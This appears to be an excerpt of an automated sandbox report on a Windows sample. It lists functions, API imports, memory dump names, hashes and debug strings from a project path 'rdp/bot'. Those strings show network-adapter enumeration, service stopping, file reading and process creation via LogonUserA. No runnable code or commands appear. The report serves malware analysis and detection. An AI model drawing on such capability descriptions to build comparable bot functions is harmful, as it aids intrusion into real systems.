Function 00007FFDA55AA31A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFDA55AA3FB
Sleep.KERNEL32 ref: 00007FFDA55AA407

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction ID: 82b590a44f9ef74a6fb0d0d0c74db15e47b47536f52f351a61f920e8b561ed4e
Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
Instruction Fuzzy Hash: E2316628B0E60F86F6669F24D86C37822516F53B70F200732E67D067E3EE2DE5445249

Function 00007FFDA55D135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFDA55D143B
Sleep.KERNEL32 ref: 00007FFDA55D1447

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction ID: 4d40d9d08b243e17191e58934ba35c9989e267a17373b8e15ac31286c7af0d24
Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
Instruction Fuzzy Hash: 5131272BF0A74AC6F622DF25A8A43782251AF42F70F100731E87E467E7CE2CA5549648

Function 00007FFDAC0F26DA Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFDAC0F27BB
Sleep.KERNEL32 ref: 00007FFDAC0F27C7

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction ID: 1f7853fc701a50417739f6a2337a121b94b253437be654623fdec6d9534273fa
Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
Instruction Fuzzy Hash: 89313C25F0F70286F7209764A8A42792251AF407F0F204332D4BD467E7CF2CE6A5BA8C

Function 00007FFDA557135A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFDA557143B
Sleep.KERNEL32 ref: 00007FFDA5571447

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction ID: 9cf44c40f6e0fa698186f87568ae93e88c6fd1214150adc72ef228c2e479a006
Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
Instruction Fuzzy Hash: BB310028F0E60B82FA225F25E8A937C2251AF52F74F500B71D47D467D3EF2CE5456648

Function 00007FFDAC12605A Relevance: 3.8, APIs: 3, Instructions: 74sleepCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFDAC12613B
Sleep.KERNEL32 ref: 00007FFDAC126147

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Sleepmemcpy
String ID:
API String ID: 1125407320-0
Opcode ID: 5e371bd4c57d357b9d91630660d94021c6a2b3b1d0672597ac3c6c04a2c664ba
Instruction ID: d70710fa6f1b3637de557c29ee414f718e98a0209ab879a53f58adb738e77a10
Opcode Fuzzy Hash: 5e371bd4c57d357b9d91630660d94021c6a2b3b1d0672597ac3c6c04a2c664ba
Instruction Fuzzy Hash: 1C314D6EF0EE0241F6729B28A8A43382251AF517F4FA00731D43D067E3CE2CF945664E

Function 00007FF70CAD19E2 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF70CAD1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF70CAD162F), ref: 00007FF70CAD1FEE

SleepEx.KERNEL32 ref: 00007FF70CAD1A51

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: HandleModuleSleep
String ID:
API String ID: 1071907932-0
Opcode ID: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
Instruction ID: e249e462232cc499a07babca199bb3a587bb13e71742004f3ceb758950397c3c
Opcode Fuzzy Hash: c8c003f471b71a30b05e0dbd92c2347c511595d06f4733816d1c0ed97604998d
Instruction Fuzzy Hash: 860181A371C64782F7902654FC50BBDA295AF84364FD41071E74F872A9DF6CD9458360

Function 00007FF70CAD1360 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetServiceStatus.SECHOST ref: 00007FF70CAD1385

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction ID: 7678cc1f16fe507eeef8c5233d35c3f7f367ef20108db94931d9ce328bce1699
Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
Instruction Fuzzy Hash: 03D06CF4D1A6028AE704BF49FC85825A6A0BF89785BD09035C10F43228EF2C66698B60

Function 00007FF70CAD862A Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

rand_s.MSVCRT ref: 00007FF70CAD863B

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: rand_s
String ID:
API String ID: 863162693-0
Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction ID: 58ec38d81c839771f1e7a6b203021bc5fc902465ae642d9423b41da36380c355
Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
Instruction Fuzzy Hash: 24C00276A185408AD620AB24EC4565AA770EB98308FD08121E65E82668DB3CD61ACF14

Function 00007FFDA5578F37 Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA5578F45

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction ID: 451bcb5299ef06af2f25bd520162bfd089cada86a78b9623dc56df69653208fd
Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
Instruction Fuzzy Hash: 50C08C9AF2B10A83EB0A6FA2B8A113402B09F9EB04F001434D84E823739F1C98D84A48

Non-executed Functions

Function 00007FFDA55AB648 Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDA55AB698
HeapAlloc.KERNEL32 ref: 00007FFDA55AB6AC
GetAdaptersInfo.IPHLPAPI ref: 00007FFDA55AB6C6
GetProcessHeap.KERNEL32 ref: 00007FFDA55AB6DD
HeapFree.KERNEL32 ref: 00007FFDA55AB6EE
GetProcessHeap.KERNEL32 ref: 00007FFDA55AB6F8
HeapAlloc.KERNEL32 ref: 00007FFDA55AB709
GetAdaptersInfo.IPHLPAPI ref: 00007FFDA55AB723

Strings

[E] (%s) -> GetBestInterface failed(res=%08lx), xrefs: 00007FFDA55AB7B9
(adapter_num != NULL), xrefs: 00007FFDA55AB75E
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55AB7E1, 00007FFDA55AB800
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AB76C, 00007FFDA55AB79C
net_info, xrefs: 00007FFDA55AB735, 00007FFDA55AB765, 00007FFDA55AB795, 00007FFDA55AB7B2, 00007FFDA55AB816, 00007FFDA55AB855
[E] (%s) -> GetAdaptersInfo failed(res=%08lx), xrefs: 00007FFDA55AB73C, 00007FFDA55AB81D
C:/Projects/rdp/bot/codebase/net.c, xrefs: 00007FFDA55AB757, 00007FFDA55AB787
(pref_adapter_type != NULL), xrefs: 00007FFDA55AB78E
mem_alloc, xrefs: 00007FFDA55AB7DA, 00007FFDA55AB7F9
[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d), xrefs: 00007FFDA55AB85C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Heap$Process$AdaptersAllocInfo$Free
String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$C:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
API String ID: 2437369060-2367710237
Opcode ID: 62033286d4d3422d0c1f4b9f13a41cc89f9b28d67cfe47d7682641c56829a688
Instruction ID: 624d702c8a7cfd57e031ca33405bd011cc42594af65fede6628be5b2dac17cfe
Opcode Fuzzy Hash: 62033286d4d3422d0c1f4b9f13a41cc89f9b28d67cfe47d7682641c56829a688
Instruction Fuzzy Hash: 6E519068B0E64F96EF139F20E4783B822A0AF43F54F844435DA4D46397EEADE945C748

Function 00007FFDA55A20A5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 00007FFDA55A20EA
fseek.MSVCRT ref: 00007FFDA55A2109
_errno.MSVCRT ref: 00007FFDA55A211D
_errno.MSVCRT ref: 00007FFDA55A2138
_errno.MSVCRT ref: 00007FFDA55A21F7

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

_errno.MSVCRT ref: 00007FFDA55A2212
_errno.MSVCRT ref: 00007FFDA55A225F
fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2125, 00007FFDA55A216D, 00007FFDA55A21A0, 00007FFDA55A21D3, 00007FFDA55A21FF, 00007FFDA55A230A, 00007FFDA55A2420, 00007FFDA55A24EB, 00007FFDA55A25AA, 00007FFDA55A2635, 00007FFDA55A2678
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A2174, 00007FFDA55A21A7, 00007FFDA55A21DA
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FFDA55A2206
(path != NULL), xrefs: 00007FFDA55A2166
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FFDA55A2427
mem_alloc, xrefs: 00007FFDA55A24C4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55A215F, 00007FFDA55A2192, 00007FFDA55A21C5
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FFDA55A267F
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FFDA55A2311
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FFDA55A212C
NULL, xrefs: 00007FFDA55A2669
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55A24CB
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FFDA55A24F2
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FFDA55A21CC
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FFDA55A25B1
(buf_sz != NULL), xrefs: 00007FFDA55A2199

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: 0a059dc8ad38eedfc636077698553a61f56f5cb7248aab2b76f3f6cd307a87ec
Instruction ID: d80aab309c31b2cfd413c2ddcd583e31c905f045e996a225604e455159c80459
Opcode Fuzzy Hash: 0a059dc8ad38eedfc636077698553a61f56f5cb7248aab2b76f3f6cd307a87ec
Instruction Fuzzy Hash: AED15169B0B60F91EA129F15E86937923A1BF57F84F554832EA0D073E3EE3DE5458308

Function 00007FFDA55A8237 Relevance: 70.5, APIs: 16, Strings: 24, Instructions: 469servicememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA55A7521: Sleep.KERNEL32 ref: 00007FFDA55A7550

OpenServiceA.ADVAPI32 ref: 00007FFDA55A827D
EnumDependentServicesA.ADVAPI32 ref: 00007FFDA55A82C7
GetLastError.KERNEL32 ref: 00007FFDA55A82D5
GetLastError.KERNEL32 ref: 00007FFDA55A83E7
GetProcessHeap.KERNEL32 ref: 00007FFDA55A857C
HeapAlloc.KERNEL32 ref: 00007FFDA55A858D
EnumDependentServicesA.ADVAPI32 ref: 00007FFDA55A85BF

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

C:/Projects/rdp/bot/codebase/scm.c, xrefs: 00007FFDA55A832D
[D] (%s) -> Service is already stopped(lpServiceName=%s), xrefs: 00007FFDA55A83D6
~, xrefs: 00007FFDA55A8468
[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x), xrefs: 00007FFDA55A83B1
[E] (%s) -> OpenServiceA(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A88F5
P, xrefs: 00007FFDA55A8471
[I] (%s) -> Service stopped(lpServiceName=%s,pid=%lu), xrefs: 00007FFDA55A8B1B
(svc != NULL), xrefs: 00007FFDA55A8334
, xrefs: 00007FFDA55A862C
[D] (%s) -> %s, xrefs: 00007FFDA55A879B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A8342
[E] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A82F6, 00007FFDA55A8620
[I] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) done(lpServiceName=%s,dep_num=%lu), xrefs: 00007FFDA55A85D8
No dependent service(s) to be stopped, xrefs: 00007FFDA55A878D
scm_stop, xrefs: 00007FFDA55A82EF, 00007FFDA55A833B, 00007FFDA55A83AA, 00007FFDA55A83CF, 00007FFDA55A83F5, 00007FFDA55A85D1, 00007FFDA55A8619, 00007FFDA55A86FE, 00007FFDA55A8794, 00007FFDA55A8814, 00007FFDA55A88EE, 00007FFDA55A8A58, 00007FFDA55A8B14
[W] (%s) -> scm_find failed(lpServiceName=%s), xrefs: 00007FFDA55A8705
~, xrefs: 00007FFDA55A8689
[D] (%s) -> Service stop requested(lpServiceName=%s), xrefs: 00007FFDA55A8A5F
P, xrefs: 00007FFDA55A8692
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55A85F5
, xrefs: 00007FFDA55A8408
mem_alloc, xrefs: 00007FFDA55A85EE
[E] (%s) -> OpenServiceA(SERVICE_ENUMERATE_DEPENDENTS) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A83FC

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$ErrorLast$DependentEnumHeapOpenServices$AllocCloseControlHandleProcessSleepfflushfwrite
String ID: $ $(svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$No dependent service(s) to be stopped$P$P$[D] (%s) -> %s$[D] (%s) -> Service is already stopped(lpServiceName=%s)$[D] (%s) -> Service stop requested(lpServiceName=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> OpenServiceA(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> OpenServiceA(SERVICE_ENUMERATE_DEPENDENTS) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> Service stop failed(lpServiceName=%s,pid=%lu,err=%08x)$[I] (%s) -> EnumDependentServicesA(SERVICE_STATE_ALL) done(lpServiceName=%s,dep_num=%lu)$[I] (%s) -> Service stopped(lpServiceName=%s,pid=%lu)$[W] (%s) -> scm_find failed(lpServiceName=%s)$mem_alloc$scm_stop$~$~
API String ID: 1728296876-1811208690
Opcode ID: 1b0ea2fe4bf6dd729f85b02111fe2a353584e5f075a0c7cd8e7877cc5ea1397e
Instruction ID: f2db1aaf8e042ecf5f8182f9784331854831a611d4888fb20c666c46eadf892d
Opcode Fuzzy Hash: 1b0ea2fe4bf6dd729f85b02111fe2a353584e5f075a0c7cd8e7877cc5ea1397e
Instruction Fuzzy Hash: 6F126569B0E60FA5FB6B4F04A8B83791250AF57F48F104832C74E067D7DE6FA9858309

Function 00007FFDA55AF0AE Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA55AF140
strcat.MSVCRT ref: 00007FFDA55AF27A
strlen.MSVCRT ref: 00007FFDA55AF290
strlen.MSVCRT ref: 00007FFDA55AF29B
strlen.MSVCRT ref: 00007FFDA55AF2CF
strcat.MSVCRT ref: 00007FFDA55AF2DF
strlen.MSVCRT ref: 00007FFDA55AF31D
strlen.MSVCRT ref: 00007FFDA55AF32A
strlen.MSVCRT ref: 00007FFDA55AF353
strcat.MSVCRT ref: 00007FFDA55AF365
LogonUserA.ADVAPI32 ref: 00007FFDA55AF3D5
GetLastError.KERNEL32 ref: 00007FFDA55AF3E3
CloseHandle.KERNEL32 ref: 00007FFDA55AF6A7

Strings

[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu), xrefs: 00007FFDA55AF40A
h, xrefs: 00007FFDA55AF876
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFDA55AF1DB, 00007FFDA55AF20F, 00007FFDA55AF243
(app != NULL), xrefs: 00007FFDA55AF216
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AF1F0, 00007FFDA55AF224, 00007FFDA55AF258
NULL, xrefs: 00007FFDA55AF936, 00007FFDA55AF942, 00007FFDA55AF94E, 00007FFDA55AF95A, 00007FFDA55AF966, 00007FFDA55AF972, 00007FFDA55AF97E, 00007FFDA55AF98A, 00007FFDA55AF996
[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x), xrefs: 00007FFDA55AF1B0
process_create, xrefs: 00007FFDA55AF1A9, 00007FFDA55AF1E9, 00007FFDA55AF21D, 00007FFDA55AF251, 00007FFDA55AF403, 00007FFDA55AF59C, 00007FFDA55AF689, 00007FFDA55AF6F8, 00007FFDA55AF82C, 00007FFDA55AF91E
(pi != NULL), xrefs: 00007FFDA55AF1E2
